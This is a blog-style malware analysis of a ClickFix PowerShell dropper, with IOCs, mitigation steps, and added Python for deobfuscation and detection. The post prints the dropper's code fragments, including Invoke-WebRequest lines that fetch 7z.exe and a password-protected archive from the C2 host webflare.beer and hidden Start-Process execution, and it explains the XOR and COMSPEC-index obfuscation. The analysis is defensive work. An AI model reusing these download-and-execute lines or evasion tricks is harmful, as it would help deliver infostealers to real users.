DEV Community

Yusril Ihsanul Alim


ClickFIX Malware

Here's the complete breakdown of this malware:


Stage 1: Outer Wrapper (Obfuscation Layer)

The outer script combines two evasion tricks before handing control to Invoke-Expression:

  1. XOR obfuscation: The massive hex string ($x24) is XOR-decoded with the repeating key 5JZv8J9xz. Each byte is recovered by converting 2 hex chars to an integer, then XORing with the key character at position (i/2) % key_length, where i is the index of the hex pair in the string.

  2. Dynamic iex construction: Instead of writing iex literally (a token many detections key on), it indexes into the COMSPEC environment variable (C:\Windows\system32\cmd.exe):

    • Index 4 → i
    • Index 26 → e
    • Index 25 → x
    • Joined with -join '' → iex (Invoke-Expression)
  3. Execution via iex: .($env:ComSpec[4,26,25]-join'') $y25 applies the dot-source operator (.) to the assembled string, so it evaluates to iex $y25 and executes the decoded payload in the current scope.
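As an added example (not code from the original post or from the malware sample), the following Python reproduces both Stage 1 tricks so an analyst can undo them offline: the repeating-key XOR over a hex string, and resolution of $env:ComSpec[...] index lists back to the literal they build. The hex blob below is constructed from a harmless string using the key quoted above; the real $x24 blob is not reproduced.

```python
import re

KEY = "5JZv8J9xz"                         # XOR key quoted in the write-up
COMSPEC = r"C:\Windows\system32\cmd.exe"  # stock value of %COMSPEC%


def xor_hex_decode(hex_blob: str, key: str = KEY) -> str:
    """Undo the Stage 1 scheme: every 2 hex chars form one byte, which is
    XORed with key[(i // 2) % len(key)], i being the index of the hex pair."""
    if len(hex_blob) % 2:
        raise ValueError("hex blob has odd length")
    out = bytearray()
    for i in range(0, len(hex_blob), 2):
        byte = int(hex_blob[i:i + 2], 16)
        out.append(byte ^ ord(key[(i // 2) % len(key)]))
    return out.decode("utf-8", errors="replace")


def xor_hex_encode(plain: str, key: str = KEY) -> str:
    """Inverse of xor_hex_decode; only used here to build a constructed sample."""
    return "".join(f"{b ^ ord(key[n % len(key)]):02x}"
                   for n, b in enumerate(plain.encode("utf-8")))


def resolve_comspec_indices(indices, comspec: str = COMSPEC) -> str:
    """Pick characters out of COMSPEC the way $env:ComSpec[4,26,25] does."""
    return "".join(comspec[i] for i in indices)


# Matches  $env:ComSpec[4,26,25]-join''  (whitespace around -join is optional)
_COMSPEC_RE = re.compile(r"\$env:ComSpec\[([\d,\s]+)\]\s*-join\s*''", re.IGNORECASE)


def reveal_comspec_tricks(script: str, comspec: str = COMSPEC) -> str:
    """Rewrite every ComSpec index trick in a script to the literal it builds,
    so '.($env:ComSpec[4,26,25]-join'') $y25' reads as '.(iex) $y25'."""
    def repl(match):
        idx = [int(x) for x in match.group(1).split(",")]
        return resolve_comspec_indices(idx, comspec)
    return _COMSPEC_RE.sub(repl, script)


# Constructed sample: a harmless string encoded with the real key. The actual
# $x24 blob from the sample is deliberately not reproduced here.
SAMPLE_PLAIN = "Write-Host 'stage 2 would be defined and launched here'"
SAMPLE_HEX = xor_hex_encode(SAMPLE_PLAIN)
WRAPPER_LINE = ".($env:ComSpec[4,26,25]-join'') $y25"

if __name__ == "__main__":
    print(xor_hex_decode(SAMPLE_HEX))            # recovers SAMPLE_PLAIN
    print(resolve_comspec_indices([4, 26, 25]))  # iex
    print(reveal_comspec_tricks(WRAPPER_LINE))   # .(iex) $y25
```

Pointing xor_hex_decode at the real $x24 blob (with the same key) yields the Stage 2 text discussed next. The index trick only works while %COMSPEC% has its stock value, which is why the indices are hard-coded rather than searched for.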


Stage 2: Decoded Payload (Dropper)

The decoded payload ($v7am6e) is a complete malware dropper:

Configuration

Variable  Value
$g7       7z (archive extension)
$h8       2026 (password for the archive)

Execution Flow

Step 1 — Create temp workspace

$i9 = Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName())
New-Item -ItemType Directory -Path $i9 -Force | Out-Null

Step 2 — Download 7z.exe (decompressor)

$j10 = Join-Path $i9 ([System.IO.Path]::GetRandomFileName() + '.exe')
Invoke-WebRequest -Uri 'https://webflare.beer/api/7z.exe' -OutFile $j10

Downloads a 7-Zip command-line binary from webflare.beer. It is presumably a stock 7z.exe used as a living-off-the-land decompressor, but because it is fetched live its hash cannot be confirmed (see IOCs below).

Step 3 — Download encrypted payload

$k11 = Join-Path $i9 ([System.IO.Path]::GetRandomFileName() + '.' + $g7)
Invoke-WebRequest -Uri 'https://webflare.beer/api/index.php?a=dl&token=...' -OutFile $k11

Downloads a password-protected 7z archive from the same host. The query string (src=recaptcha, cb=chrome, mode=recaptcha, ref=https://mdwaktual.com/) is dressed up as a reCAPTCHA callback and names the lure site mdwaktual.com as the supposed referrer. The download is retried up to 3 times with 2-second delays if it fails.

Step 4 — Extract with 7z

$o15 = @('x', '-y', '-p2026', '-o' + $n14, $k11)
& $j10 @o15 | Out-Null

Extracts the archive with 7-Zip (x = extract with full paths, -y = assume yes on all prompts, -p2026 = archive password, -o<dir> = write output to the extraction directory $n14). If 7z.exe failed to download, it falls back to executing the archive directly.

Step 5 — Execute the final payload

$p16 = Get-ChildItem -Path $n14 -Filter *.exe -Recurse -File | Select-Object -First 1
$q17 = Get-ChildItem -Path $n14 -Filter *.msi -Recurse -File | Select-Object -First 1

It looks for either a .exe or .msi file inside the extracted archive, then executes it with Start-Process -WindowStyle Hidden.

Step 6 — Cleanup: Deletes the downloaded 7z archive and 7z.exe.


Stage 3: Final Stage

The decoded dropper ($v7am6e) is itself launched as a new hidden PowerShell process; it is this child process that performs Steps 1-6 above and starts the extracted binary:

Start-Process -WindowStyle Hidden powershell -ArgumentList '-NoProfile','-WindowStyle','Hidden','-Command',$v7am6e

The final payload hosted at webflare.beer could not be recovered (the encrypted archive was not available at analysis time), so its family is unconfirmed. Based on the delivery pattern it is plausibly:

  • AsyncRAT, AgentTesla, RedLine Stealer, or a similar commodity infostealer/RAT
  • The reCAPTCHA-mimicking URI with cb=chrome&ref=https://mdwaktual.com points to a ClickFix-style fake captcha / fake browser update lure aimed at credential harvesting

IOCs (Indicators of Compromise)

Type                    Value
C2 Domain               webflare.beer
Download URL 1          https://webflare.beer/api/7z.exe
Download URL 2          https://webflare.beer/api/index.php?a=dl&token=d123a6194156eab57f412223d4a8add891e6952bc1bcc89eea3cbf411b9da042&src=recaptcha&cb=chrome&ref=https://mdwaktual.com/&mode=recaptcha
Archive Password        2026
Temp Directory Pattern  Randomly-named folder in %TEMP% (from [System.IO.Path]::GetRandomFileName(), i.e. an 8.3-style name)
7z.exe hash             Unknown (fetched live from C2)
Referrer spoof          mdwaktual.com (passed in the ref= query parameter)

Mitigation

  1. Block the domain webflare.beer at firewall/DNS level
  2. Block the *.beer TLD if your org doesn't use it
  3. Restrict PowerShell execution via Constrained Language Mode or AppLocker, and turn on Script Block Logging (Event ID 4104) so the XOR-decoded stage is captured even though it never touches disk
  4. Monitor powershell.exe spawning from another powershell.exe with -WindowStyle Hidden, and any executable running from a randomly named %TEMP% subfolder with 7-Zip-style arguments (x -y -p<password>)
  5. Check %TEMP% for randomly-named directories containing 7z.exe or .7z files; note that on a successful run Step 6 deletes both, so a completed infection may leave only the extracted .exe/.msi behind
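To make items 4 and 5 concrete, here is an added Python example (not from the post or the sample) that applies these hunts to process-creation events. The events are constructed, Sysmon-style records with Image, ParentImage and CommandLine fields; the user name and the randomly named paths in them are made up to mirror the GetRandomFileName pattern. The three rules flag the hidden PowerShell child from Stage 3, 7-Zip extraction of a password-protected archive from a %TEMP% subfolder (Step 4), and the $env:ComSpec index trick from Stage 1.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1-style fields), not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TMP = r"C:\Users\victim\AppData\Local\Temp\q4ztwe2r.d1k"   # made-up random folder

SAMPLE_EVENTS = [
    {   # Stage 3 hand-off: PowerShell spawns a hidden PowerShell child
        "ParentImage": PS,
        "Image": PS,
        "CommandLine": "powershell -NoProfile -WindowStyle Hidden -Command $g7='7z';...",
    },
    {   # Step 4: randomly named 7z.exe extracting a password-protected archive in %TEMP%
        "ParentImage": PS,
        "Image": TMP + r"\k3jdh0ss.lf2.exe",
        "CommandLine": '"' + TMP + r'\k3jdh0ss.lf2.exe" x -y -p2026 -o' + TMP + r"\out " + TMP + r"\a0f1kd9.7z",
    },
    {   # Stage 1 wrapper: iex assembled from $env:ComSpec indices
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": PS,
        "CommandLine": ".($env:ComSpec[4,26,25]-join'') $y25",
    },
    {   # Benign: a user opens an interactive shell
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": PS,
        "CommandLine": "powershell.exe -NoProfile",
    },
]

# -WindowStyle Hidden, including the abbreviated -w h form PowerShell accepts
_HIDDEN = re.compile(r"-w(indowstyle)?\s+h(idden)?", re.I)
# An .exe one level below a random folder in the user's %TEMP%
_TEMP_EXE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\\[^\\]+\.exe$", re.I)
# 7-Zip extract command with a password switch somewhere after it
_7Z_EXTRACT = re.compile(r"\s+x\s+(?=.*\s-p\S+)", re.I)
# Indexing into $env:ComSpec to build a command name
_COMSPEC_BUILD = re.compile(r"\$env:ComSpec\s*\[", re.I)


def classify(event):
    """Return the names of every rule the event matches (empty list if none)."""
    img, parent, cmd = (event.get(k, "") for k in ("Image", "ParentImage", "CommandLine"))
    is_ps = img.lower().endswith("powershell.exe")
    hits = []
    if is_ps and parent.lower().endswith("powershell.exe") and _HIDDEN.search(cmd):
        hits.append("hidden_powershell_child")
    if _TEMP_EXE.search(img) and _7Z_EXTRACT.search(cmd):
        hits.append("7z_extract_from_temp")
    if is_ps and _COMSPEC_BUILD.search(cmd):
        hits.append("comspec_index_string_build")
    return hits


def triage(events):
    """Map event index -> matched rules, keeping only events that fired something."""
    result = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            result[i] = hits
    return result


if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(idx, rules, SAMPLE_EVENTS[idx]["CommandLine"][:60])
```

The rules deliberately key on behaviour the dropper cannot easily change (a hidden PowerShell child, 7-Zip switches from a %TEMP% path, indexing into $env:ComSpec) rather than on the domain or password, which the operator can rotate at no cost.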
